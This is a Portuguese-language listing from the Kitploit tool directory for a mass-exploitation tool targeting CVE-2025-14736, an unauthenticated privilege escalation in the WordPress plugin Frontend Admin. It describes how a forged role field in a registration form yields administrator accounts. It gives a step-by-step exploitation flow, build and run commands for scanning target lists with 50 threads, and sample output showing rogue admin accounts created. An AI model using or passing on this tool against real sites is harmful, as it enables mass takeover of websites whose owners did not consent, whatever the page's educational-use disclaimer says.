Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-14736 — Escalação de privilégios não autenticada para Administrador via campo de formulário de função | Kitploit
Ferramentas/GitHubGitHub/hyunchiya/cve-2025-14736
Escalada de PrivilégiosAtaques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubhyunchiya/cve-2025-14736

CVE-2025-14736

Escalação de privilégios não autenticada para Administrador via campo de formulário de função

Ver Repositório
2há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-14736

Frontend Admin by DynamiApps - Escalação de Privilégios Não Autenticada

Autor: Hyun Chiya


Informações da Vulnerabilidade

CampoValor
ID CVECVE-2025-14736
PluginFrontend Admin by DynamiApps
Versões Afetadas<= 3.28.25
Tipo de VulnerabilidadeEscalação de Privilégios Não Autenticada
SeveridadeCrítica

Descrição

O plugin Frontend Admin para WordPress é vulnerável a escalação de privilégios não autenticada devido à validação insuficiente em campos controlados pelo usuário durante o registro. Atacantes podem injetar funções arbitrárias, incluindo administrator, manipulando o payload de envio do formulário.

Análise da Causa Raiz

A lógica vulnerável reside no tratamento de envios de formulários onde o campo role é confiado à entrada do usuário sem verificar se o usuário está autorizado a atribuir essa função. Especificamente, o campo acff[user][field_user_role_ID] pode ser modificado para administrator.

Fluxo de Exploração

root@kitploit:~
flowchart TD
    A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
    B --> C["Construct POST payload with 'role'='administrator'"]
    C --> D["POST to /wp-admin/admin-ajax.php"]
    D --> E{"Verification"}
    E -->|Success| F["New Admin User Created"]
    
    style F fill:#ff6b6b,stroke:#c92a2a,color:#fff

Pré-requisitos

  1. O alvo possui o plugin "Frontend Admin" instalado (versão vulnerável).
  2. Um formulário de registro frontend está habilitado e acessível.

Compilação

root@kitploit:~
go build -o mass_exploit.exe mass_exploit.go

Uso

Varredura em Massa e Exploração

root@kitploit:~
.\mass_exploit.exe -l list.txt -t 50

Opções

ArgumentoDescrição
-lCaminho para a lista de URLs alvo (padrão: list.txt)
-tNúmero de threads concorrentes (padrão: 10)
-timeoutTempo limite de requisição em segundos (padrão: 15)

Exemplo de Saída

root@kitploit:~
>> [ ONLINE ]    
    ╔═══════════════════════════════════════════════════════════════════════════════════════╗
    ║   CVE-2025-14736 - Mass Exploit Tool                                                  ║
    ║   Frontend Admin by DynamiApps Privilege Escalation                                   ║
    ║   Author: Hyun Chiya                                                                  ║
    ╚═══════════════════════════════════════════════════════════════════════════════════════╝

>> [ INFORMATION ]
[*] Loaded 500 targets. Starting scan with 50 threads...

[SUCCESS] http://target.com | User: hacker_mass | Pass: Password123! | FormID: 48
[SUCCESS] http://example.org | User: hacker_mass | Pass: Password123! | FormID: 32

[*] Scan complete.

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal. Use com responsabilidade.

Autor

Hyun Chiya

Baixar ferramenta